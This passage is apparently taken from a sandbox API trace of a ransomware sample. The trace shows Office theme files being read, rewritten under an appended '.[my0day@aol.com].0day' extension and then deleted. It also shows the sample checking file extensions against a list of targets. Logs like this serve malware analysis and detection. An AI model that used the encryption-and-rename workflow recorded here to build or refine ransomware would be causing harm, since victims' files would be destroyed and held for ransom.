hTemplateFile=0x0) returned 0x380 [0273.014] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=211090) returned 1 [0273.015] CloseHandle (hObject=0x380) returned 1 [0273.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx")) returned 0x20 [0273.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0273.702] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.702] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.702] GetLastError () returned 0x0 [0273.702] ReadFile (in: hFile=0x354, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x33892, lpOverlapped=0x0) returned 1 [0273.710] WriteFile (in: hFile=0x39c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x338a0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x338a0, lpOverlapped=0x0) returned 1 [0273.716] ReadFile (in: hFile=0x354, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.716] WriteFile (in: hFile=0x39c, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.716] SetEndOfFile (hFile=0x39c) returned 1 [0273.716] CloseHandle (hObject=0x39c) returned 1 [0273.716] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.716] SetEndOfFile (hFile=0x354) returned 1 [0273.722] CloseHandle (hObject=0x354) returned 1 [0273.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.725] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx")) returned 1 [0273.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.738] lstrlenW (lpString=".doc") returned 4 [0273.738] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.738] lstrlenW (lpString=".docx") returned 5 [0273.738] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.738] lstrlenW (lpString=".pdf") returned 4 [0273.739] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.739] lstrlenW (lpString=".xls") returned 4 [0273.739] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.739] lstrlenW (lpString=".xlsx") returned 5 [0273.739] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.739] lstrlenW (lpString=".ppt") returned 4 [0273.739] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.763] lstrlenW (lpString=".zip") returned 4 [0273.763] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.763] lstrlenW (lpString=".rar") returned 4 [0273.763] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.763] lstrlenW (lpString=".bz2") returned 4 [0273.763] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".7z") returned 3 [0273.764] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.764] lstrlenW (lpString=".dbf") returned 4 [0273.764] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.764] lstrlenW (lpString=".1cd") returned 4 [0273.764] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.764] lstrlenW (lpString=".jpg") returned 4 [0273.764] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.764] lstrlenW (lpString=".doc") returned 4 [0273.764] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".docx") returned 5 [0273.764] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.764] lstrlenW (lpString=".pdf") returned 4 [0273.764] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".xls") returned 4 [0273.764] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".xlsx") returned 5 [0273.764] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.764] lstrlenW (lpString=".ppt") returned 4 [0273.764] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.764] lstrlenW (lpString=".zip") returned 4 [0273.764] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".rar") returned 4 [0273.764] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".bz2") returned 4 [0273.764] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.764] lstrlenW (lpString=".7z") returned 3 [0273.764] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.765] lstrlenW (lpString=".dbf") returned 4 [0273.765] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.765] lstrlenW (lpString=".1cd") returned 4 [0273.765] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0273.765] lstrlenW (lpString=".jpg") returned 4 [0273.765] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.765] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.765] lstrlenW (lpString="Opulent.eftx") returned 12 [0273.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.768] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=32857) returned 1 [0273.768] CloseHandle (hObject=0x394) returned 1 [0273.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx")) returned 0x20 [0273.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.778] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.778] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.780] GetLastError () returned 0x0 [0273.780] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x8059, lpOverlapped=0x0) returned 1 [0273.783] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x8060, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x8060, lpOverlapped=0x0) returned 1 [0273.784] ReadFile (in: hFile=0x39c, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.784] WriteFile (in: hFile=0x384, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.784] SetEndOfFile (hFile=0x384) returned 1 [0273.784] CloseHandle (hObject=0x384) returned 1 [0273.784] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.784] SetEndOfFile (hFile=0x39c) returned 1 [0273.787] CloseHandle (hObject=0x39c) returned 1 [0273.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.787] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx")) returned 1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString=".doc") returned 4 [0273.788] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString=".docx") returned 5 [0273.788] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.788] lstrlenW (lpString=".pdf") returned 4 [0273.788] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString=".xls") returned 4 [0273.788] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString=".xlsx") returned 5 [0273.788] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.788] lstrlenW (lpString=".ppt") returned 4 [0273.788] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString=".zip") returned 4 [0273.788] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString=".rar") returned 4 [0273.788] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString=".bz2") returned 4 [0273.788] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString=".7z") returned 3 [0273.788] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString=".dbf") returned 4 [0273.788] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString=".1cd") returned 4 [0273.788] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString=".jpg") returned 4 [0273.788] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.788] lstrlenW (lpString=".doc") returned 4 [0273.788] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString=".docx") returned 5 [0273.789] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.789] lstrlenW (lpString=".pdf") returned 4 [0273.789] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString=".xls") returned 4 [0273.789] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString=".xlsx") returned 5 [0273.789] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.789] lstrlenW (lpString=".ppt") returned 4 [0273.789] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.789] lstrlenW (lpString=".zip") returned 4 [0273.789] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString=".rar") returned 4 [0273.789] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString=".bz2") returned 4 [0273.789] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString=".7z") returned 3 [0273.789] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.789] lstrlenW (lpString=".dbf") returned 4 [0273.789] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.789] lstrlenW (lpString=".1cd") returned 4 [0273.789] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0273.789] lstrlenW (lpString=".jpg") returned 4 [0273.789] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.789] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.789] lstrlenW (lpString="Origin.eftx") returned 11 [0273.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.792] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=40941) returned 1 [0273.792] CloseHandle (hObject=0x394) returned 1 [0273.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx")) returned 0x20 [0273.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.804] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.804] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.814] GetLastError () returned 0x0 [0273.814] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x9fed, lpOverlapped=0x0) returned 1 [0273.858] WriteFile (in: hFile=0x390, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x9ff0, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x9ff0, lpOverlapped=0x0) returned 1 [0273.859] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.859] WriteFile (in: hFile=0x390, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xea, lpOverlapped=0x0) returned 1 [0273.859] SetEndOfFile (hFile=0x390) returned 1 [0273.859] CloseHandle (hObject=0x390) returned 1 [0273.859] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.859] SetEndOfFile (hFile=0x394) returned 1 [0273.862] CloseHandle (hObject=0x394) returned 1 [0273.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.862] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx")) returned 1 [0273.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.863] lstrlenW (lpString=".doc") returned 4 [0273.863] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString=".docx") returned 5 [0273.863] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.863] lstrlenW (lpString=".pdf") returned 4 [0273.863] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString=".xls") returned 4 [0273.863] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString=".xlsx") returned 5 [0273.863] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.863] lstrlenW (lpString=".ppt") returned 4 [0273.863] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.863] lstrlenW (lpString=".zip") returned 4 [0273.863] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString=".rar") returned 4 [0273.863] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString=".bz2") returned 4 [0273.863] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString=".7z") returned 3 [0273.863] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.863] lstrlenW (lpString=".dbf") returned 4 [0273.863] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.863] lstrlenW (lpString=".1cd") returned 4 [0273.863] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.863] lstrlenW (lpString=".jpg") returned 4 [0273.863] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.864] lstrlenW (lpString=".doc") returned 4 [0273.864] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString=".docx") returned 5 [0273.864] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.864] lstrlenW (lpString=".pdf") returned 4 [0273.864] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString=".xls") returned 4 [0273.864] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString=".xlsx") returned 5 [0273.864] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.864] lstrlenW (lpString=".ppt") returned 4 [0273.864] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.864] lstrlenW (lpString=".zip") returned 4 [0273.864] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString=".rar") returned 4 [0273.864] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString=".bz2") returned 4 [0273.864] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString=".7z") returned 3 [0273.864] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.864] lstrlenW (lpString=".dbf") returned 4 [0273.864] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.864] lstrlenW (lpString=".1cd") returned 4 [0273.864] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0273.864] lstrlenW (lpString=".jpg") returned 4 [0273.864] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.865] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.865] lstrlenW (lpString="Slipstream.eftx") returned 15 [0273.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.940] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=27789) returned 1 [0273.940] CloseHandle (hObject=0x380) returned 1 [0273.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx")) returned 0x20 [0274.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 